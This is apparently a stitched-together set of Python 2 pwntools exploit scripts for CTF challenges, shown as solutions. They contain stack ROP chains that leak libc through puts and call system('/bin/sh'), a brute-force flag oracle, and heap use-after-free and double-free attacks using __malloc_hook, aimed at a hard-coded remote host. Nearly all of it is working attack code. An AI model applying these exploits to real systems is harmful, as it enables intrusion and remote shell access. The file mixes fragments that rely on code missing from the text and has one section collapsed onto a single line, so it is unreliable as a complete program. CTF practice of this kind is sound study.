# CTF exploit script for the 32-bit challenge binary ./hacker_system_ver1,
# written against pwntools in Python 2 syntax (`print 'x', y` statements and
# str/bytes used interchangeably) - it will not run unmodified on Python 3.
# Flow: an overlong "name" overflows a stack buffer with a ROP chain that
# (1) calls puts(puts@GOT) to disclose the libc load address and (2) read()s a
# second stage into the writable address 0x804be00, from which system("/bin/sh")
# is reached. Every address below is absolute, so the chain depends on the
# binary being built without PIE; a PIE build would invalidate all of them.
# The file was flattened onto one line upstream; line breaks and indentation
# here are a reconstruction.
from pwn import *
import time  # NOTE(review): unused in this script
debug=0
elf = ELF('./hacker_system_ver1')
if debug:
    # Local debugging path: run the binary under gdb with a breakpoint at
    # 0x8048B1B (an address from the author's own analysis, not shown here).
    p= process('./hacker_system_ver1')
    context.log_level = 'debug'
    libc = ELF('/lib/i386-linux-gnu/libc.so.6')
    gdb.attach(p,'b *0x8048B1B')
else:
    # NOTE(review): the host string carries a trailing space
    # ('111.230.149.72 '); whether pwntools tolerates it is not shown here.
    p = remote('111.230.149.72 ', 10005)
    libc = ELF('./libc32.so')  # libc build shipped with the challenge
# Menu dialogue: option 2, then a length of 200 - far more than the 0x34 bytes
# the padding below suggests the buffer holds - then the overlong name.
p.recvuntil('>')
p.sendline('2')
p.recvuntil('length:')
p.sendline('200')
p.recvuntil('name:')
padding = 'a'*0x34  # filler up to the saved frame pointer (inferred from the layout below)
pr = 0x08048455     # pop ebx ; ret            (see gadget list at the bottom)
pppr = 0x08048d49   # pop esi ; pop edi ; pop ebp ; ret
# Stage 1 chain: puts(puts@GOT) -> read(0, 0x804be00, 0x100) -> pop ebp = 0x804be00
# -> continue at 0x8048B1A, which presumably transfers execution to the buffer
# that read() just filled (0x8048B1A is not in the gadget list; unverified here).
# The trailing comment is the author's alternative plain `ret` gadget.
rop = padding + p32(0x804be00)+p32(elf.symbols['puts']) + p32(pr) + p32(elf.got['puts']) + p32(elf.symbols['read'])+p32(pppr)+p32(0)+p32(0x804be00) + p32(0x100)+ p32(0x08048d4b)+p32(0x804be00)+p32(0x8048B1A)# p32(0x804843e)
p.sendline(rop)
p.recvuntil('find!!\n')
# NOTE(review): recv(4) returns whatever is available, possibly fewer than
# 4 bytes; u32() then raises rather than producing a wrong address.
puts_addr = u32(p.recv(4))
print'[+]puts address:',hex(puts_addr)
# Rebase the libc ELF object on the leaked puts address so that
# libc.symbols[...] and libc.search(...) yield runtime addresses.
libc.address = puts_addr-libc.symbols['puts']
print'[+]system address:',hex(libc.symbols['system'])
# Stage 2, delivered into 0x804be00 by the read() above: a frame-pointer
# value, then system("/bin/sh") with a dummy return address (0xdeadbeef).
rop = p32(0x804bc00)+ p32(libc.symbols['system'])+p32(0xdeadbeef)+p32(next(libc.search('/bin/sh')))
p.send(rop)
p.interactive()
'''
============================================================
0x08048d4b : pop ebp ; ret
0x08048d48 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x08048455 : pop ebx ; ret
0x08048d4a : pop edi ; pop ebp ; ret
0x08048d49 : pop esi ; pop edi ; pop ebp ; ret
0x0804843e : ret
0x080487f0 : ret 0x458b
0x0804819c : ret 0x8694
0x080485ce : ret 0xeac1
'''
if debug: p= process('./zazahui_ver2') #context.log_level = 'debug' gdb.attach(p,'b *0x80487AB') else: p = remote('111.230.149.72 ', 10010) dic = range(33,127) dic.append(0) #qdic.reverse() p.recvuntil('>') start = 0x804A084 end = 0x804A060 flag='' i = start while i>=end: pro = log.progress('go') for j in dic: pro.status('boom for '+hex(i)) bomb = (chr(j)+flag)+'\0'*(0xb0-len((chr(j)+flag)))+p32(i) p.send(bomb) if'too'in p.recvuntil('>'): flag = chr(j) + flag pro.success(hex(i)+': '+hex(j)+' '+chr(j)) i = i-1
# Tail of a 64-bit exploit script (Python 2 / pwntools). `p`, `libc` and
# `rdi_ret` are defined earlier in the file, outside this view; `rdi_ret` is
# presumably the `pop rdi ; ret` gadget in the list at the bottom (0x400a93).
# NOTE(review): recvuntil('\x7f')[-6:] assumes that the first 0x7f byte in the
# stream is the top byte of the leaked pointer. An earlier 0x7f in the
# program's output, or a pointer whose high byte is not 0x7f, gives a wrong
# `libc.address` with no error raised.
addr_leak = p.recvuntil('\x7f')[-6:]
puts_addr = u64(addr_leak.ljust(8,'\0'))  # zero-extend the 6 leaked bytes to a qword
print'[+] puts : ',hex(puts_addr)
libc.address = puts_addr - libc.symbols['puts']  # rebase libc on the leak
print'[+] system: ',hex(libc.symbols['system'])
# Final chain: a value for rbp (0x602c00, presumably a saved-rbp slot being
# overwritten), then system("/bin/sh") via pop rdi ; ret.
rop = p64(0x602c00)+ p64(rdi_ret) +p64(next(libc.search('/bin/sh'))) + p64(libc.symbols['system'])
p.send(rop)
p.interactive()
'''
============================================================
0x0000000000400a8c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400a8e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400a90 : pop r14 ; pop r15 ; ret
0x0000000000400a92 : pop r15 ; ret
0x0000000000400a8b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400a8f : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400640 : pop rbp ; ret
0x00000000004009dd : pop rbx ; pop rbp ; ret
0x0000000000400a93 : pop rdi ; ret
0x0000000000400a91 : pop rsi ; pop r15 ; ret
0x0000000000400a8d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400541 : ret
0x0000000000400980 : ret 0x458b
'''
# Heap-exploitation script fragment (Python 2 / pwntools). `add`, `delete_user`,
# `print_user`, `p`, `elf` and `libc` are defined earlier in the file, outside
# this view; from their use here `add` appears to take (name, an index or flag,
# a size, the data written into the allocation). Everything below about what
# the target program does with these calls is inferred and unverified.
#step 1 leak libc
# Two entries share the name 'step1'; one delete, then a 0x38-byte allocation
# that reuses the freed memory and overwrites a record (fake size 0x18, name
# '1', a field of 3, and a pointer to puts@GOT). print_user('1') then prints
# the bytes at that pointer. This only works if delete_user frees memory that
# is still referenced - a use-after-free in the target (assumed).
add('step1\n',0,0x20,'hack by p4nda')
add('step1\n',0,0x20,'hack by p4nda')
delete_user('step1')
add('nop1\n',0,0x38,p64(0x18)+'1'.ljust(0x20,'\0')+p64(3)+p64(elf.got['puts']))
print_user('1')
p.recvuntil('intro:')
# NOTE(review): recv(6) may return fewer than 6 bytes; ljust() then hides the
# short read and the computed address is silently wrong.
puts_addr = u64(p.recv(6).ljust(8,'\0'))
print'[+]puts addr :',hex(puts_addr)
libc.address = puts_addr - libc.symbols['puts']  # rebase libc on the leak
print'[+]system addr :',hex(libc.symbols['system'])
#step 2 leak stack
# Same pattern, but the pointer is libc's `environ`, which holds a stack address.
add('step2\n',0,0x20,'hack by p4nda')
add('step2\n',0,0x20,'hack by p4nda')
delete_user('step2')
add('nop2\n',0,0x38,p64(0x18)+'2'.ljust(0x20,'\0')+p64(3)+p64(libc.symbols['environ']))
print_user('2')
p.recvuntil('intro:')
stack_addr = u64(p.recv(6).ljust(8,'\0'))
print'[+]stack addr :',hex(stack_addr)
# NOTE(review): distance from `environ` to the target stack slot, taken from
# one debugging session (0x108). It is specific to that environment and
# binary build; any change in environment size or frame layout breaks it.
stack_offset =0x7ffd3af20438-0x7ffd3af20330
#add('padding\n',18,0x138,'hack by p4nda')
#delete_user('nop2')
#delete_user('2')
#delete_user()
# Abandoned variant of step 3, kept by the author as a string literal (no-op).
'''
add('padding_3\n',18,0x20,'hack by p4nda')
add('step3\n',18,0x20,'hack by p4nda')
add('step3\n',18,0x20,'hack by p4nda')
delete_user('step3')
add('nop3\n',18,0x38,p64(0x18)+'3'.ljust(0x20,'\0')+p64(3)+p64(0))
delete_user('nop3')
delete_user('3')
delete_user('padding_3')
add('ctrl3\n',18,0x38,p64(0xdeadbeef))
'''
# Step 3: two same-named 0x70 entries deleted twice (a double free in the
# target, assumed), then allocations that write p64(0x61) into the freed
# region - presumably a fake chunk size header prepared for the later steps.
add('step3\n',0,0x70,'hack by p4nda')
add('step3\n',0,0x70,'hack by p4nda')
delete_user('step3')
delete_user('step3')
print'[+]stack addr :',hex(stack_addr)  # repeated debug print of the same value
#gdb.attach(p,'b *0x400a0f')
add('step3\n',0,0x70,p64(0x61))
add('step3\n',0,0x70,'hack by p4nda')
add('step3\n',18,0x70,'hack by p4nda')
# Step 4 (continuation of the same heap script; helpers defined outside this
# view): the double-delete pattern again on 0x50-byte entries. The first
# re-allocation writes a libc address derived from __malloc_hook into the freed
# chunk's first qword, which presumably redirects where a later allocation of
# this size is placed. Whether the two follow-up allocations are consumed as
# intended depends on the target's allocator state and is not verifiable here.
add('step4\n',0,0x50,'hack by p4nda')
add('step4\n',0,0x50,'hack by p4nda')
delete_user('step4')
delete_user('step4')
#gdb.attach(p,'b *0x400a0f')
add('step4\n',0,0x50,p64(libc.symbols['__malloc_hook']+0x10+0x08*6))
add('step4\n',0,0x50,'hack by p4nda')
add('step4\n',0,0x50,'hack by p4nda')
# Final stage of the heap script (helpers, `stack_addr`, `stack_offset` and
# `libc` come from earlier in the file). Four 0x38 entries are created and one
# freed, presumably to shape the heap; the 0x50 allocation then writes a stack
# address (leaked stack_addr minus the hard-coded stack_offset, minus 8), and
# the 0x40 allocation carries a three-qword chain - pop rdi ; ret (0x401053,
# see the gadget list below), "/bin/sh", system - which presumably lands on the
# stack at that address. Like stack_offset, 0x401053 is build-specific.
add('padding\n',0,0x38,'hack by p4nda')
add('padding\n',0,0x38,'hack by p4nda')
add('padding\n',0,0x38,'hack by p4nda')
add('padding\n',0,0x38,'hack by p4nda')
delete_user('padding')
add('step4\n',0,0x50,p64(0)*3+p64(stack_addr-stack_offset-0x8))
add('step4\n',0,0x40,p64(0x0000000000401053)+p64(next(libc.search('/bin/sh')))+p64(libc.symbols['system']))
#add('step3\n',18,0x60,'a'*0x40)
p.interactive()
'''
============================================================
0x000000000040104c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040104e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000401050 : pop r14 ; pop r15 ; ret
0x0000000000401052 : pop r15 ; ret
0x000000000040104b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040104f : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400870 : pop rbp ; ret
0x0000000000401053 : pop rdi ; ret
0x0000000000401051 : pop rsi ; pop r15 ; ret
0x000000000040104d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400709 : ret
0x0000000000400782 : ret 0x2018
0x0000000000400abd : ret 0x8b48
'''